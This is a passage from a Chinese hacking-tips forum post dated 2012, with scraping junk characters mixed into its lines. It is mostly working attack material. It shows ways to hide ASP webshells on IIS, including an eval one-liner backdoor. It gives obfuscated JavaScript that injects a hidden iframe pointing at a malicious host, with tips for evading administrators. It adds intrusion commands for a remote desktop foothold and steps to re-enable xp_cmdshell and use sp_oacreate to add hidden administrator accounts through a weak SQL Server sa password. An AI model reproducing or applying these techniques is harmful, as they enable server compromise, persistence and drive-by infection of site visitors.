% }& v' N. [: u2 _: C. j( k: `53、隐藏ASP后门的两种方法
( L" r1 b. O: K3 _4 a/ ]1、建立非标准目录:mkdir images..\& `8 D/ ?2 I# Z
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp7 r% D6 l' j5 j8 b f9 v
通过web访问ASP木马:http://ip/images../news.asp?action=login8 \0 L% `3 ~# u0 c/ D$ _0 C
如何删除非标准目录:rmdir images..\ /s
# _9 `/ e2 P/ v' ^, v2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
8 s+ j" G8 ]! _% v* @5 V5 Fmkdir programme.asp
/ T/ P& S# J7 c! f! l0 J新建1.txt文件内容:<!--#include file=”12.jpg”-->
6 z+ I/ I# v, ~新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
^& [9 j) X: E! K$ O# Wattrib +H +S programme.asp
" D* o& q% l0 C6 g) |1 [通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt; E, S/ _2 p W9 H/ U
( ?& H) Y7 v$ F, S* T
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。4 F1 q: h, M2 N$ u. l: \) \
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。; w s0 V! T* F4 ~9 W
/ h7 z& [9 z; b; u' d
55、JS隐蔽挂马/ X: v7 @3 i( k Y
1.
( ^ k `& z9 @$ j& y8 k cvar tr4c3="<iframe src=ht";) K+ ]2 |$ a5 k+ T1 j7 n# l' V
tr4c3 = tr4c3+"tp:/";
: ]9 o: m& U! etr4c3 = tr4c3+"/ww";
* ]5 N' @$ S( w0 h2 ~4 B6 utr4c3 = tr4c3+"w.tr4";
5 a# r: c1 n' C' ltr4c3 = tr4c3+"c3.com/inc/m";: e( I- { i, u! h
tr4c3 = tr4c3+"m.htm style="display:none"></i";$ O' D' `* Z! d+ b' i9 i
tr4c3 =tr4c3+"frame>'";) `( U0 k7 q& _4 a; i* A1 [' k( z
document.write(tr4c3);
, ~# S& t2 t! K9 {# `8 w8 O避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
$ }7 Z. @) d+ T; g6 }
3 w$ J; T& d" k2.
3 b0 L8 U* z) r& r" p8 T/ G转换进制,然后用EVAL执行。如+ x0 d' h }$ q, J8 u. ^0 C# b+ S
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
" D- u& L! q+ A- y/ i不过这个有点显眼。5 _6 u" e* I9 v0 h0 X: W
3.. o* z8 G) }& k* K* f# u+ {( \
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');6 J5 h& m; J& {, I" ~3 r, v+ \ l2 s
最后一点,别忘了把文件的时间也修改下。
" e+ }: ]0 G1 {0 g$ r9 i) X5 ^4 v7 i" {. _. J! U v
56.3389终端入侵常用DOS命令
$ i0 y6 t0 _- l! l" ^) J" N% Ktaskkill taskkill /PID 1248 /t' Q; n, w. Y" k1 i* g2 C3 E
" @8 E1 t3 v7 @8 ztasklist 查进程0 s0 t, C: t' ~4 `- A( g9 t9 U6 w; ?
4 b9 x2 L! F) F2 r& I1 b8 V" F
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
. I7 u0 u' O! F- X7 Q- @% F; v8 b5 X! Tiisreset /reboot6 @+ F" {3 K3 a+ H0 }
tsshutdn /reboot /delay:1 重起服务器
& j1 t! i' g+ D+ b6 j- M+ q& J
% j# W, Y W4 E4 |0 y0 }logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,) v# M6 D' }8 e" P2 W
& b# T; A* o+ w, X4 _
query user 查看当前终端用户在线情况' g8 p- L2 u$ `/ b
; a# `1 E5 ~ k j, X
要显示有关所有会话使用的进程的信息,请键入:query process *
& v! `7 c! d2 H+ T# n1 X0 ?; K+ V/ R$ h. }
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
4 b) K& @8 r- \! M/ E- M+ f; O* X; C( d6 h8 ], Q& w
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
$ d3 A9 I. P2 Y' u: |1 S7 ^* ?3 Y0 M- h0 N7 r
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02' X. [, F- \. T% q
" W/ z4 ^) z; n9 D% j7 C
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启+ @/ v6 y" @" D3 R
; {* o+ @" U$ X* Z命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
- z# p) z$ K: D2 B ^* h0 E
! L/ Q# q$ U* x. g6 T6 z4 ~" m命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
% c5 O$ H; l8 ?
( a6 V+ C) }6 J+ H& n2 |* {命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
# W. Q, h1 O& Q# G. m+ y0 ~8 i, a; p& R% |& }, k" w9 I' J
56、在地址栏或按Ctrl+O,输入:" t' v+ D ?4 `1 t$ a0 E
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
$ j9 H4 r# j* I
~/ l, w# J6 O9 b8 |源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
) T" {( k: C% X$ ?4 P5 d$ h' E( {! Z g% I" _; a n
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,' |& S% F } z2 \ y
用net localgroup administrators是可以看到管理组下,加了$的用户的。: P, B' K6 Q* s, _
% S; \% y& [+ Z$ k3 P2 u6 j
58、 sa弱口令相关命令
; w' ^$ p2 o1 f/ `- ~. s* k
& l1 E# a* {0 o+ W6 W) L一.更改sa口令方法:: F1 X' @, }9 k
用sql综合利用工具连接后,执行命令:
' F+ \% I1 U1 v8 g' i. J& B2 f2 A* z9 cexec sp_password NULL,'20001001','sa'
) R5 F; _, r9 e& c3 @$ e(提示:慎用!); o; i4 {. y$ ~
- Q7 j7 w+ U/ y0 P; W' i二.简单修补sa弱口令.9 l4 F" i1 V; H- v) \
8 ?1 i" R; R" L5 ~3 E0 T, R方法1:查询分离器连接后执行:
; }* F# L5 U1 b# Dif exists (select * from$ [) m# S: B( T' q
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and5 z9 |1 U& a3 H+ o( T0 t) u
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)$ Y9 ~1 c3 ~$ I7 r; l7 m% J1 b, `
$ a2 w# ?) B1 @* _* Q
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
+ A+ e! b5 b* b, ^
8 f$ U v. w$ n8 F- v4 P4 v" e+ @GO' Q% V' A2 o" a1 m a' O% }+ I, y" }
& e3 `+ e" [* N然后按F5键命令执行完毕
$ f6 v/ s6 z2 Y2 U, ^' o' R* ?9 W2 X' c
方法2:查询分离器连接后
' }: N' c6 p ^第一步执行:use master% o0 c k' E& k" T! a5 a* W( H
第二步执行:sp_dropextendedproc 'xp_cmdshell'/ R( |- \9 C, H
然后按F5键命令执行完毕
2 y9 ^; p/ H6 I6 I0 n+ k+ `) f1 T! d8 ]* r
) g2 z' |7 U% d" ]三.常见情况恢复执行xp_cmdshell.
, v; a' q6 K! v3 v. {% |, }, O5 F9 ~
4 {& c; Q- B# S# G. ^
5 [4 _5 `" f" k/ B' n, w1 未能找到存储过程'master..xpcmdshell'.
( P* |$ O5 u3 ^ 恢复方法:查询分离器连接后,* ^2 Q! o7 M; ^$ m/ D; f
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
7 `9 R$ {4 d( q$ s第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
: y3 G* N0 l& @# r* ?' P: [/ i) |然后按F5键命令执行完毕
- D% k: u% n, I; m* P: N
# q8 e3 S* I d& N2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)4 Q" P, J' P" x/ k( [2 R
恢复方法:查询分离器连接后,
' E- O7 L, k, K! t2 J5 H第一步执行:sp_dropextendedproc "xp_cmdshell" C. n6 U( F# ^7 P2 {
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'4 {- I Q1 A/ h( a
然后按F5键命令执行完毕
8 ~1 H! \5 v0 {( p; Y& X _! [
; u: W( A! R7 m' B# }3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)! q& l1 u5 A2 S; H1 L9 C+ k, q
恢复方法:查询分离器连接后,- s3 {8 _, l0 T# o( c
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
& J2 d, A6 `0 L0 x2 O) q第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
8 Q5 m, z- y( Z' c; V然后按F5键命令执行完毕
- T# \8 t; N U! X4 D2 v3 p) b) \
1 d$ y# \+ t2 t! p1 R四.终极方法.
. E- b5 f9 o" l. |9 Z# v1 ?如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:6 e+ ~5 a. j- l; W9 U G8 O+ s
查询分离器连接后,; o' S% q. ?7 V# D8 b; t. W, C
2000servser系统:
" c" I8 o; {8 S( x0 g: Z, fdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
) ?- S& r# h" v; \( O2 J$ b5 U) Y' V y
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
# U9 w+ n( w3 x- }3 g- z% m6 V8 ]) u/ Z2 f. s
xp或2003server系统:
; a8 j. y5 w* ^5 s: d$ u4 c' n& V) s$ w* }& O4 _- k
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
2 K6 r" c: ^1 a& i, M3 @" N3 H" K) @) J
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'* m* A! v1 p+ q; l
|
发表于 2012-9-15 14:51:03
收藏
支持
反对